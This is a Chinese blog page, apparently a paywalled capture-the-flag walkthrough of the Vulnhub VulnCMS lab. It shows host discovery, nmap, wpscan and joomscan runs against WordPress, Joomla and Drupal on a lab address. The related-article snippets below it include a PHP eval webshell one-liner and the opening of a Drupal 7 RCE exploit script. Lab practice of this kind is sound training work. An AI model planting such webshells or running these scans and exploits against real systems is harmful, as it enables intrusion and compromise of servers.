渗透靶场——Vulnhub:VulnCMS

最新推荐文章于 2025-04-17 09:33:37 发布
最新推荐文章于 2025-04-17 09:33:37 发布
阅读量5k 收藏 12
点赞数 6
分类专栏: 渗透测试 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tlovejr/article/details/124032258
版权
本文介绍了在Vulnhub靶场中针对VulnCMS的渗透测试过程,包括主机存活探测、端口扫描、漏洞扫描和利用。作者通过nmap发现三个CMS服务:WordPress、Joomla和Drupal,并分别使用wpscan、joomscan和cmsmap进行漏洞扫描。随后,作者详细展示了如何利用这些漏洞获取shell,包括WordPress的webshell、Joomla的SQL注入和Drupal的攻击方法。最终,作者通过SSH进行提权操作,成功攻陷靶机。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

前几天一直在做HackMyVM系列靶场,今天正常看到了一个Vulnhub系列靶场,这个靶场里面是有3个cms漏洞,所以就那来做做看

1、主机存活探测

arp-scan -l

在这里插入图片描述

2、端口扫描

nmap -A -p- -T4 192.168.1.7

在这里插入图片描述在这里会发现一共有3个模块端口,分别是5000端口的wordpress模板、8001端口的Joomla模板、9001端口的Drupal模板,针对这几个cms漏洞,那就直接对症下药,对应的模板用对应的工具去扫描

3、漏洞扫描

对于wordpress模板来说,直接用wpscan来扫描

wpscan --url http://192.168.1.7:5000/-e u

在这里插入图片描述在这里插入图片描述
得知wordpress版本为5.7.2(这个前面nmap也扫出了)和用户名wordpress_admin,其实上网搜索也可以得到这个版本的漏洞

我们先放一边,看看其他两个再回来做打算

对于Joomla模板也有固定的东西去进行扫描,因为以前没有遇到过这个模板,所以得先安装一下这个扫描模块,克隆后直接切换到目录后就可以直接用

git clone https://github.com/rezasp/joomscan.git

在这里插入图片描述

cd joomscan

perl joomscan.pl --url http://192.168.1.7:8081/

最低0.47元/天 解锁文章
校赛VulnCMS
qq_43774856的博客
11-30 633
校赛VulnCMS 打开链接得到一个网页。 找到了两处可以读取任意文件的地方。 根据登陆界面 http://202.119.201.199:9002/member/index/login 猜测存在后台管理界面访问http://202.119.201.199:9002/admin/index/login ,猜测账号密码都为admin,进入管理员界面后,如图所示。 发现输入命令的地方。 > echo '<?php @eval($_POST["fe1w0"]);phpinfo();?&gt
web靶场搭建之帝国cms7.5
m0_60716947的博客
12-18 4790
帝国cms
Vulnhub-vulncms
lionwerson的博客
02-22 2326
Vulnhub-vulncms nmap扫描端口: 开放5000端口,8081端口,9001端口。 80端口: 5000端口(wordpress): 8081端口(joomla): 9001端口(drupal): drupal7版本存在一个rce,exploit: #!/usr/bin/env python3 import requests import argparse from bs4 import BeautifulSoup def get_args(): parser = arg
【网络安全渗透测试零基础入门必知必会】之Vulnhub靶场Breach1.0解析,零基础入门到精通,收藏这一篇就够了
最新发布
bigbangbangbang1的博客
04-17 966
这个靶场真是综合性挺强的,各种坑。。。伟大得老马曾说过:“ 道路是曲折的,前途是光明的 ”学网安之后“ 道路曲折我走不完,前途光明我看不见 ”哈哈哈,总结一下1.官方设定靶机192.168.110.140,端口扫描应该是做了防护。2.从80端口入手,F12查看源码发现base64编码base64 两次解密 得到 pgibbons:damnitfeelta 登录到impresscms
vulnhubVulnCMS: 1
qwweggfe的博客
08-06 757
VulnCMS: 1 首先进行ip扫描 看看开启了哪些端口 对端口进行扫描 nmap -sC -sV -p 22,5000,80,8081,9001 192.168.181.146 --min-rate=2000 在端口协议上进行扫描发现三个 WordPress 5.7.2 Joomla drupal,于是在msf上进行查看 我尝试了第八个,可是不行 于是我来测试最后一个 search dr...
web渗透cms靶场
weixin_49794194的博客
01-10 909
主页测试了很多地方漏洞还是比较多的,可能是系统比较老的原因,但是我们的目标主要是文件上传拿下webshell,这里我们找到了会员注册 然后成功跳转会员中心,发现可以插入新的新闻,或者上传个人头像 这里首先哥斯拉的php后缀改为jpg,因为这个靶场是文件类型验证,burp抓传数据包 将第21行的filename jpg更改为php上传,上传之后f12查看网页源代码看看文件被插去哪里了 这里看到data有会员资料上传的php应该是上传之后重命名,我们直接打开哥斯拉连接 连接成功ipconfig,渗渗透靶场结束
vulnhub渗透测试VulnCMS
weixin_44687621的博客
08-25 396
靶机地址:http://www.vulnhub.com/entry/vulncms-1,710/ 扫描虚拟机网卡网段,获得靶机ip地址。 看看靶机开放的服务,这里详细说一下命令参数 -sS SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快,效率高 -sV 版本检测,用来扫描目标主机和端口上运行的软件的版本 -T5 T0-T2:串行扫描 T3-T5:并行扫描 -A 启用操作系统和版本检测,脚本扫描和路由跟踪功能 可以看到上面开放了四个web服务,分别是:单独的nginx、wordp
渗透测试集成靶场vulhub的搭建
ws1813004226的博客
05-09 2366
渗透测试集成靶场vulfocus的搭建 在搭建该靶场之前,我们需要先将docker环境配置好。搭建步骤如下: 1.安装https协议、CA证书、dirmngr apt-get update apt-get install -y apt-transport-https ca-certificates apt-get install dirmngr 2.添加GPG密钥并添加更新源 curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/lin
Vulnhun_VULNCMS: 1
qq_45434762的博客
06-26 599
主机信息kali:192.168.1.12 VULNCMS: 1:192.168.1.6 信息收集使用netdiscover发现目标主机netdiscover -r 192.168.1.0...
AtomCMS靶场
球球的博客
04-14 4194
AtomCMS建站软件,文件上传漏洞,xss漏洞
大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-25 5514
数据与网络安全作为保障大数据系统正常运行的基石,同样备受关注。今天写博客时候发现自己很久没更新数据安全与网络安全方面的内容了,于是花了点时间写一篇CMS靶场实训博客。本文通过CMS靶场实训,深入分析CMS系统的安全漏洞,探讨防范措施,提供实战经验和攻防能力,有助于加强大数据与网络安全意识。
内部靶场系列|Sdcms
白帽子凯哥聊黑客
06-09 1152
由上可知,该函数基本上拦截常见的关键字(eg: phpinfo),但是规则是死的,人是活的,只要将关键字进行拆分、隔开等就可以实现绕过。7、由此可见,该应用会检测文件内容是否带有关键字段,先查看是否能上传php文件,且是否能解析php代码。/app/lib/class/sdcms_upload.php为文件上传相关代码,定义了白名单。4、单纯的在这里加了白名单,那么任意的php文件都可以上传,显得有点简单,因此继续往下面看代码。6、猜测是否会检测文件内容,尝试上传未带有关键字的文件内容,发现上传成功。
简单了解cms,复现vulhub中的wordpress漏洞
weixin_64655821的博客
09-12 1178
简单了解cms,复现vulhub中的wordpress漏洞
cms文章管理系统靶场——sql手注
WinnieRingo的博客
07-21 2138
cms文章管理系统靶场是适合初级渗透人员学习sql注入的靶场之一。
靶机渗透练习11-VulnCMS (三个国外著名cms)
Force~
04-03 6589
靶机地址: https://www.vulnhub.com/entry/vulncms-1,710/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -sn 192..
靶机渗透练习09-VulnCMS
hirak0的博客
04-15 2314
靶机描述 靶机地址:https://www.vulnhub.com/entry/vulncms-1,710/ Description This box is all about CMS as its name suggests. You need to enumerate the box, find the CMS, and exploit in order to gain access to other and finally get the user and root flag. Hint: Proc
Vulnhub 靶场】【VulnCMS: 1】【简单】【20210613】
惟忆
12-16 1558
靶场介绍:https://www.vulnhub.com/entry/vulncms-1,710/ 靶场下载:https://download.vulnhub.com/vulncms/VulnCMS.ova 靶场难度:简单 发布日期:2021年06月13日 文件大小:1.4 GB 靶场作者:tombstoneGhost (Simardeep Singh) 靶场系列:VulnCMS 打靶耗时:2+小时,目录扫描花费了大量时间,然后就是关键的 Linux 信息搜索。
Vulnhub-VULNCMS: 1渗透
laoyanCZ的博客
01-10 1464
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
DC-6靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-02 1764
dc-6靶场详细渗透过程
HackMyvm靶机系列(4)-vulny
qq_70727026的博客
05-13 478
一、信息收集 老办法,先来一波网段扫描,发现主机 nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox 使用nmap扫描端口,发现两个端口,一个80端口,一个33060(不知道是什么,先不管它) nmap -sC -sV 192.168.200.153 -p- 访问主页,然而并没有发现什么有用的信息。 老办法,先来一波目录扫描,看看能不能发现什么有用的信息。 使用gobuster扫描一下目录。 gobuster dir ..
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TJA小傲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值